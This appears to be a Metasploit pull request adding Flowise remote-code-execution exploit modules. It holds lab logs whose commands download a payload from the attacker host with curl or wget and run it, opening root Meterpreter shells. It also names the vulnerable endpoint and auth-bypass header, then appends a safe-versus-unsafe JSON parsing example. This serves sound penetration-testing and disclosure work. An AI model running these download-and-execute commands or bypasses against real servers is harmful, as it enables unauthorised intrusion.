Add Flowise RCE exploits (CVE-2025-59528, CVE-2025-8943) #20705
msutovsky-r7 left a comment

```
msf exploit(multi/http/flowise_custommcp_rce) > check
[*] Flowise version detected: 3.0.0
[*] 127.0.0.1:3000 - The target appears to be vulnerable. Version 3.0.0 is vulnerable to CVE-2025-8943
msf exploit(multi/http/flowise_custommcp_rce) > run verbose=true
[*] Command to run on remote host: curl -so ./yvMbpEGLSTB http://172.17.0.1:8080/6-QSk_1Z4L51LCLriobShA;chmod +x ./yvMbpEGLSTB;./yvMbpEGLSTB&
[*] Fetch handler listening on 172.17.0.1:8080
[*] HTTP server started
[*] Adding resource /6-QSk_1Z4L51LCLriobShA
[*] Started reverse TCP handler on 172.17.0.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Flowise version detected: 3.0.0
[+] The target appears to be vulnerable. Version 3.0.0 is vulnerable to CVE-2025-8943
[*] Client 172.21.0.2 requested /6-QSk_1Z4L51LCLriobShA
[*] Sending payload to 172.21.0.2 (curl/8.12.1)
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3090404 bytes) to 172.21.0.2
[*] Meterpreter session 1 opened (172.17.0.1:4444 -> 172.21.0.2:41646) at 2025-11-19 08:37:25 +0100
meterpreter >
meterpreter > sysinfo
Computer     : 172.21.0.2
OS           : (Linux 6.17.4-76061704-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > getuid
Server username: root
```
Co-authored-by: msutovsky-r7 <martin_sutovsky@rapid7.com>
…rt and HTTP response validation
…mixin, documentation, and Docker Compose setup
…) and add Basic Auth service example
msutovsky-r7 left a comment

```
msf exploit(multi/http/flowise_custommcp_rce) > run verbose=true
[*] Command to run on remote host: wget -qO ./jMiKfYqrONf http://172.17.0.1:8080/6-QSk_1Z4L51LCLriobShA;chmod +x ./jMiKfYqrONf;./jMiKfYqrONf&
[*] Fetch handler listening on 172.17.0.1:8080
[*] HTTP server started
[*] Adding resource /6-QSk_1Z4L51LCLriobShA
[*] Started reverse TCP handler on 172.17.0.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Flowise version detected: 3.0.0
[+] The target appears to be vulnerable. (affected: >= 2.2.7-patch.1 and < 3.0.1)
[*] Client 172.21.0.2 requested /6-QSk_1Z4L51LCLriobShA
[*] Sending payload to 172.21.0.2 (Wget)
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3090404 bytes) to 172.21.0.2
[*] Meterpreter session 1 opened (172.17.0.1:4444 -> 172.21.0.2:50060) at 2025-11-20 10:33:58 +0100
meterpreter >
meterpreter > sysinfo
Computer     : 172.21.0.2
OS           : (Linux 6.17.4-76061704-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > getuid
Server username: root
```

```
msf exploit(multi/http/flowise_js_rce) > run verbose=true
[*] Command to run on remote host: wget -qO ./IiMLZkCGWZ http://172.17.0.1:8080/6-QSk_1Z4L51LCLriobShA;chmod +x ./IiMLZkCGWZ;./IiMLZkCGWZ&
[*] Fetch handler listening on 172.17.0.1:8080
[*] HTTP server started
[*] Adding resource /6-QSk_1Z4L51LCLriobShA
[*] Started reverse TCP handler on 172.17.0.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Flowise version detected: 3.0.0
[+] The target appears to be vulnerable. (affected: >= 2.2.7-patch.1 and < 3.0.6) (may work unauthenticated)
[*] Client 172.21.0.2 requested /6-QSk_1Z4L51LCLriobShA
[*] Sending payload to 172.21.0.2 (Wget)
[*] Command sent successfully (HTTP 200)
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3090404 bytes) to 172.21.0.2
[*] Meterpreter session 2 opened (172.17.0.1:4444 -> 172.21.0.2:42766) at 2025-11-20 10:40:35 +0100
meterpreter > sysinfo
Computer     : 172.21.0.2
OS           : (Linux 6.17.4-76061704-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > getuid
Server username: root
```
msutovsky-r7 left a comment

```
msf exploit(multi/http/flowise_js_rce) > run verbose=true
[*] Command to run on remote host: wget -qO ./MyPRGRWPiiTH http://172.17.0.1:8080/6-QSk_1Z4L51LCLriobShA;chmod +x ./MyPRGRWPiiTH;./MyPRGRWPiiTH&
[*] Fetch handler listening on 172.17.0.1:8080
[*] HTTP server started
[*] Adding resource /6-QSk_1Z4L51LCLriobShA
[*] Started reverse TCP handler on 172.17.0.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Flowise version detected: 3.0.0
[+] The target appears to be vulnerable. (affected: >= 2.2.7-patch.1 and < 3.0.6) (may work unauthenticated)
wget -qO ./MyPRGRWPiiTH http://172.17.0.1:8080/6-QSk_1Z4L51LCLriobShA;chmod +x ./MyPRGRWPiiTH;./MyPRGRWPiiTH&
[*] Client 172.21.0.2 requested /6-QSk_1Z4L51LCLriobShA
[*] Sending payload to 172.21.0.2 (Wget)
[*] Command sent successfully (HTTP 200)
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3090404 bytes) to 172.21.0.2
[*] Meterpreter session 5 opened (172.17.0.1:4444 -> 172.21.0.2:49224) at 2025-11-21 14:54:02 +0100
meterpreter >
```

```
msf exploit(multi/http/flowise_custommcp_rce) > run verbose=true
[*] Command to run on remote host: wget -qO ./RKJYlPhhUo http://172.17.0.1:8080/84MXSOLXzp3D5wBw9VEswg;chmod +x ./RKJYlPhhUo;./RKJYlPhhUo&
[*] Fetch handler listening on 172.17.0.1:8080
[*] HTTP server started
[*] Adding resource /84MXSOLXzp3D5wBw9VEswg
[*] Started reverse TCP handler on 172.17.0.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Flowise version detected: 3.0.0
[+] The target appears to be vulnerable. (affected: >= 2.2.7-patch.1 and < 3.0.1)
[*] Client 172.21.0.2 requested /84MXSOLXzp3D5wBw9VEswg
[*] Sending payload to 172.21.0.2 (Wget)
[*] Meterpreter session 2 opened (172.17.0.1:4444 -> 172.21.0.2:47464) at 2025-11-21 14:52:17 +0100
meterpreter >
```
msutovsky-r7 left a comment

Flowise JS RCE

```
msf exploit(multi/http/flowise_js_rce) > run verbose=true
[*] Command to run on remote host: wget -qO ./jUSqvQikK http://172.17.0.1:8080/6-QSk_1Z4L51LCLriobShA;chmod +x ./jUSqvQikK;./jUSqvQikK&
[*] Fetch handler listening on 172.17.0.1:8080
[*] HTTP server started
[*] Adding resource /6-QSk_1Z4L51LCLriobShA
[*] Started reverse TCP handler on 172.17.0.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Flowise version detected: 3.0.0
[+] The target appears to be vulnerable. (affected: >= 2.2.7-patch.1 and < 3.0.6) (may work unauthenticated)
[*] Command sent successfully (HTTP 200)
[*] Client 172.21.0.2 requested /6-QSk_1Z4L51LCLriobShA
[*] Sending payload to 172.21.0.2 (Wget)
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3090404 bytes) to 172.21.0.2
[*] Meterpreter session 2 opened (172.17.0.1:4444 -> 172.21.0.2:60210) at 2025-11-21 20:48:59 +0100
meterpreter > sysinfo
Computer     : 172.21.0.2
OS           : (Linux 6.17.4-76061704-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > getuid
Server username: root
```

Flowise custommcp RCE

```
msf exploit(multi/http/flowise_custommcp_rce) > run verbose=true
[*] Command to run on remote host: wget -qO ./jXbVzdDqF http://172.17.0.1:8080/6-QSk_1Z4L51LCLriobShA;chmod +x ./jXbVzdDqF;./jXbVzdDqF&
[*] Fetch handler listening on 172.17.0.1:8080
[*] HTTP server started
[*] Adding resource /6-QSk_1Z4L51LCLriobShA
[*] Started reverse TCP handler on 172.17.0.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Flowise version detected: 3.0.0
[+] The target appears to be vulnerable. (affected: >= 2.2.7-patch.1 and < 3.0.1)
[*] Client 172.21.0.2 requested /6-QSk_1Z4L51LCLriobShA
[*] Sending payload to 172.21.0.2 (Wget)
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3090404 bytes) to 172.21.0.2
[*] Meterpreter session 3 opened (172.17.0.1:4444 -> 172.21.0.2:35224) at 2025-11-21 20:51:10 +0100
[!] No response from server (command may still execute in background)
meterpreter >
meterpreter > sysinfo
Computer     : 172.21.0.2
OS           : (Linux 6.17.4-76061704-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > getuid
Server username: root
```
Release Notes

This adds two modules for two vulnerabilities in Flowise (CVE-2025-59528, CVE-2025-8943). The modules add an option to use Flowise credentials for authentication when the application requires it, enabling exploitation of vulnerabilities.

Hello Metasploit Team,

I've created two new exploit modules for Flowise RCE vulnerabilities along with a shared mixin to reduce code duplication and improve maintainability.

Modules

1. flowise_custommcp_rce (CVE-2025-8943)
   - `x-request-from: internal` header). Optional Basic Auth support if `FLOWISE_USERNAME`/`FLOWISE_PASSWORD` environment variables are configured on the target.
2. flowise_js_rce (CVE-2025-59528)
   - `convertToValidJSONString()` using `Function('return ' + inputString)()`
   - `FLOWISE_EMAIL`/`FLOWISE_PASSWORD` module options for versions >= 3.0.1 (JWT verification introduced)

Implementation Details

Shared mixin: Created `Msf::Exploit::Remote::HTTP::Flowise` mixin to encapsulate common functionality:
- `flowise_get_version`
- `flowise_login`, `flowise_requires_auth?`
- `flowise_send_custommcp_request`

Documentation: Comprehensive documentation with Docker Compose setup for testing multiple Flowise versions simultaneously

Testing

Successfully tested on:
- flowise_custommcp_rce (CVE-2025-8943):
- flowise_js_rce (CVE-2025-59528):

Both vulnerabilities exploit the `/api/v1/node-load-method/customMCP` endpoint, which was introduced in version 2.2.7-patch.1. The endpoint allows execution of OS commands through the Custom MCPs feature, which lacks proper authentication and authorization controls in versions before 3.0.1.
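The PR description points at the root cause of CVE-2025-59528: a "JSON" converter built on `Function('return ' + inputString)()`, which compiles and runs whatever string it is handed. The following is an added example, not Flowise's code and not part of this PR, that puts that unsafe pattern next to a hardened replacement so the difference is testable. The function names (`unsafeConvertToJSON`, `safeConvertToJSON`, `parseConfigObject`) and the sample inputs are constructed for illustration; the only thing taken from the page is the `Function('return ' + ...)` idiom itself.

```javascript
// Added example (not Flowise's or the PR's code). Shows why a parser built on
// Function('return ' + input)() is code execution, and what a safe replacement
// looks like. All names and sample inputs below are constructed.

// Unsafe pattern named in the PR description: the caller's string is compiled
// as a JavaScript function body and executed, so any expression runs.
function unsafeConvertToJSON(inputString) {
  return Function('return ' + inputString)();
}

// Hardened replacement: JSON.parse accepts only the JSON grammar and never
// evaluates code. Malformed or non-JSON input becomes an error, not execution.
function safeConvertToJSON(inputString) {
  try {
    return { ok: true, value: JSON.parse(inputString) };
  } catch (err) {
    return { ok: false, error: err.message };
  }
}

// Shape check on top of the safe parse: callers that expect an object should
// reject valid JSON of the wrong type (arrays, strings, numbers, null) too.
function parseConfigObject(inputString) {
  const result = safeConvertToJSON(inputString);
  if (!result.ok) return result;
  const v = result.value;
  if (v === null || typeof v !== 'object' || Array.isArray(v)) {
    return { ok: false, error: 'expected a JSON object' };
  }
  return result;
}

// Constructed inputs: one valid JSON document and one JavaScript expression
// that is not JSON at all. A harmless arithmetic expression is enough to show
// that the unsafe path evaluates its input rather than parsing it.
const VALID_JSON = '{"command": "echo", "args": ["hi"]}';
const EXPRESSION_INPUT = '(function () { return 6 * 7; })()';

// Runs both converters over both inputs and returns the outcomes.
function demo() {
  return {
    unsafeOnExpression: unsafeConvertToJSON(EXPRESSION_INPUT), // 42: the input executed
    safeOnExpression: safeConvertToJSON(EXPRESSION_INPUT).ok,  // false: rejected as non-JSON
    safeOnValid: safeConvertToJSON(VALID_JSON).value.command,  // "echo": parsed as data
    objectCheckOnArray: parseConfigObject('[1, 2]').ok,        // false: wrong shape
  };
}

module.exports = { unsafeConvertToJSON, safeConvertToJSON, parseConfigObject, demo };
```

The practical takeaway for anyone reviewing similar code: `JSON.parse` is the fix, and a `try`/`catch` around it plus a type check on the result is the whole hardened converter. If the original code used `Function` because some inputs were "almost JSON" (single quotes, trailing commas, unquoted keys), the right response is to reject those inputs or normalise them with a dedicated lenient JSON parser, never to evaluate them.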